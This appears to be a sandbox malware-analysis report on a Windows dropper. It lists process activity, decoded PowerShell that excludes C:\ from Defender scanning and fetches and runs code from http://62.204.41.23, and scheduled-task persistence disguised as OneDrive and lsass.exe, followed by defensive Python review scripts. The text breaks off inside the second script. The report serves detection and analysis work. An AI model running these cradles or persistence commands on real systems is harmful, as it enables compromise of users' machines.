N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1740 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 4732 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 4732 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4780 wrote to memory of 1528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4780 wrote to memory of 1528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4780 wrote to memory of 1528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4780 wrote to memory of 1528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4780 wrote to memory of 1528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4780 wrote to memory of 1528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4780 wrote to memory of 1528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4780 wrote to memory of 1528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4732 wrote to memory of 4956 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 4732 wrote to memory of 4956 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 2296 wrote to memory of 4508 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2296 wrote to memory of 4508 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2296 wrote to memory of 3912 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2296 wrote to memory of 3912 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2296 wrote to memory of 1372 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2296 wrote to memory of 1372 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2296 wrote to memory of 4920 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2296 wrote to memory of 4920 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4732 wrote to memory of 3868 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 4732 wrote to memory of 3868 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 4732 wrote to memory of 3868 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 4732 wrote to memory of 4912 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 4732 wrote to memory of 4912 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 4732 wrote to memory of 4912 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 2312 wrote to memory of 4932 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2312 wrote to memory of 4932 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2312 wrote to memory of 4432 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2312 wrote to memory of 4432 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2312 wrote to memory of 4616 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2312 wrote to memory of 4616 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2312 wrote to memory of 3860 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2312 wrote to memory of 3860 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2308 wrote to memory of 220 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 2308 wrote to memory of 812 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 4912 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 4912 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 4912 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 4912 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 4912 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 4912 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 4912 wrote to memory of 672 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 4912 wrote to memory of 672 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 4912 wrote to memory of 672 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 672 wrote to memory of 1212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 672 wrote to memory of 1212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 672 wrote to memory of 1212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe

Uses Task Scheduler COM API

persistence
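The persistence entries in this section share one pattern: a Run value named OneDrive and a scheduled task named OneDrive, both launching a binary called lsass.exe from C:\ProgramData, plus a second task launching OneDrive.exe from %APPDATA%. Both the value name and the binary name borrow trusted names, but neither file lives where the genuine binary lives, and every launch target is in a user-writable directory. The following added example (not tooling from the sandbox that produced this report) applies those two checks to the Run value and the schtasks command line recorded in this analysis; the canonical directories and user-writable prefixes in it are assumptions chosen for this sample, and the records are copied from this report.

```python
"""Review persistence records for masquerading system-binary names and
user-writable launch targets. Added example; not tooling from the sandbox."""
import fnmatch
import re
from pathlib import PureWindowsPath

# Assumed canonical homes of the impersonated binaries (lower-case globs).
EXPECTED_HOME = {
    "lsass.exe": [r"c:\windows\system32"],
    "dllhost.exe": [r"c:\windows\system32", r"c:\windows\syswow64"],
    "onedrive.exe": [r"c:\users\*\appdata\local\microsoft\onedrive",
                     r"c:\program files\microsoft onedrive"],
}
# Paths a standard user can write to: persistence here needs no admin rights
# and is not protected by OS file integrity.
USER_WRITABLE = [r"c:\users\*", r"c:\programdata\*", r"c:\windows\temp\*"]

# Records copied from the behavioral2 signatures and process list.
RUN_KEY = ("OneDrive", r"C:\ProgramData\lsass\lsass.exe")
SCHTASKS_CMD = (r'"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" '
                r'/st 22:40 /du 23:59 /sc daily /ri 1 /f')


def masquerade(path):
    """Finding if `path` carries a known system-binary name outside its home."""
    p = PureWindowsPath(path.strip('"'))
    homes = EXPECTED_HOME.get(p.name.lower())
    if homes is None:
        return None
    parent = str(p.parent).lower()
    if any(fnmatch.fnmatchcase(parent, h) for h in homes):
        return None
    return f"{p.name} outside its expected directory: {p}"


def user_writable(path):
    low = str(PureWindowsPath(path.strip('"'))).lower()
    return any(fnmatch.fnmatchcase(low, pat) for pat in USER_WRITABLE)


def parse_schtasks(cmdline):
    """Turn `schtasks /create ...` into {switch: value}; bare switches map to True."""
    toks = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]
    opts, i = {}, 1  # skip argv[0]
    while i < len(toks):
        sw = toks[i].lower()
        if i + 1 < len(toks) and not toks[i + 1].startswith("/"):
            opts[sw] = toks[i + 1]
            i += 2
        else:
            opts[sw] = True
            i += 1
    return opts


def review_task(cmdline):
    o = parse_schtasks(cmdline)
    target = o.get("/tr", "")
    findings = []
    m = masquerade(target)
    if m:
        findings.append(m)
    if user_writable(target):
        findings.append(f"task {o.get('/tn')!r} launches from user-writable path: {target}")
    if str(o.get("/sc", "")).lower() == "daily" and "/ri" in o:
        findings.append(f"daily task repeats every {o['/ri']} min for {o.get('/du')}: "
                        "effectively a continuous relaunch loop")
    if str(o.get("/rl", "")).lower() == "highest":
        findings.append("task requests highest run level")
    return findings


def review_run_key(name, target):
    findings = []
    m = masquerade(target)
    if m:
        findings.append(m)
    if user_writable(target):
        findings.append(f"Run value {name!r} launches from user-writable path: {target}")
    binary = PureWindowsPath(target).stem.lower()
    if name.lower() != binary:
        findings.append(f"Run value name {name!r} does not match binary {binary!r}")
    return findings


if __name__ == "__main__":
    for f in review_run_key(*RUN_KEY) + review_task(SCHTASKS_CMD):
        print("-", f)
```

Each record from this report yields three findings: the lsass.exe name outside System32, the user-writable launch path, and either the name mismatch (Run value) or the one-minute repetition (task). The same functions can be fed live data from `schtasks /query /xml` output or the Run keys of a host under investigation; the point of checking the parent directory rather than the file name alone is that both the task name and the binary name here are chosen to look legitimate in a process list.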

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe

"C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA
Decoded (base64 over UTF-16LE): Add-MpPreference -ExclusionPath C:\ (adds the whole system drive to the Microsoft Defender exclusion list before the payloads are dropped)

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
Decoded (base64 over UTF-16LE): $f5='bClient).Downlo'; $f1='(New-Object Net.We'; $f3='adString(''http://62.204.41.23/o.png'')';$GOO=I`E`X ($f1,$f5,$f3 -Join '')|I`E`X
Reassembled: IEX (New-Object Net.WebClient).DownloadString('http://62.204.41.23/o.png') | IEX, i.e. fetch http://62.204.41.23/o.png and execute the returned text as PowerShell; the string is split across three variables and IEX is broken with backticks to defeat simple keyword matching

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
Decoded (base64 over UTF-16LE): $f5='bClient).Downlo'; $f1='(New-Object Net.We'; $f3='adString(''http://62.204.41.23/file.png'')';$GOO=I`E`X ($f1,$f5,$f3 -Join '')|I`E`X
Reassembled: IEX (New-Object Net.WebClient).DownloadString('http://62.204.41.23/file.png') | IEX, i.e. fetch http://62.204.41.23/file.png and execute the returned text as PowerShell

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
Decoded (base64 over UTF-16LE): $f5='bClient).Downlo'; $f1='(New-Object Net.We'; $f3='adString(''http://62.204.41.23/r.png'')';$GOO=I`E`X ($f1,$f5,$f3 -Join '')|I`E`X
Reassembled: IEX (New-Object Net.WebClient).DownloadString('http://62.204.41.23/r.png') | IEX, i.e. fetch http://62.204.41.23/r.png and execute the returned text as PowerShell

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\AppData\Roaming\OneDrive.exe

"C:\Users\Admin\AppData\Roaming\OneDrive.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
(sets the hibernate and standby timeouts of the active power scheme to 0, i.e. never, on both mains and battery, so the host stays awake; run from the dropped OneDrive.exe)

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }
(registers an at-logon task named OneDrive, run level Highest, pointing at the dropped copy in %APPDATA%\OneDrive; the schtasks branch is a fallback for Windows versions below 6.2 that lack the ScheduledTasks cmdlets, and the leading <#uxwihwxmk#> is a junk comment)

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Roaming\dllhost.exe

"C:\Users\Admin\AppData\Roaming\dllhost.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "OneDrive"

C:\Users\Admin\AppData\Roaming\lsass.exe

"C:\Users\Admin\AppData\Roaming\lsass.exe"

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 22:40 /du 23:59 /sc daily /ri 1 /f
(creates, or with /f silently overwrites, a task named OneDrive that starts C:\ProgramData\lsass\lsass.exe daily at 22:40 and repeats it every 1 minute for 23:59 hours, i.e. a near-continuous relaunch; the task name mimics OneDrive while the binary name mimics lsass.exe, and the HKLM Run value recorded in the signatures points at the same file)

C:\ProgramData\lsass\lsass.exe

"C:\ProgramData\lsass\lsass.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4585.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 7
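The three `powershell -enc` entries in the process list above carry base64 over UTF-16LE, and the two download cradles hide `(New-Object Net.WebClient).DownloadString(...)` by splitting it across three string variables that are joined at run time and executed through a backtick-broken `I`E`X`. The added example below (not tooling from the sandbox that produced this report) decodes those exact arguments, resolves the split-and-join trick, and extracts the URLs and the behaviours worth flagging; the regular expressions are written for the fragment style seen in this sample and are an assumption rather than a general PowerShell parser.

```python
"""Decode and de-obfuscate the `powershell -enc` command lines recorded above.
Added example; not tooling from the sandbox that produced this report."""
import base64
import re

# Encoded arguments copied verbatim from the behavioral2 process list.
ENC_DEFENDER = "IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA"
ENC_CRADLE_O = "JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA=="
ENC_CRADLE_FILE = "JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA=="
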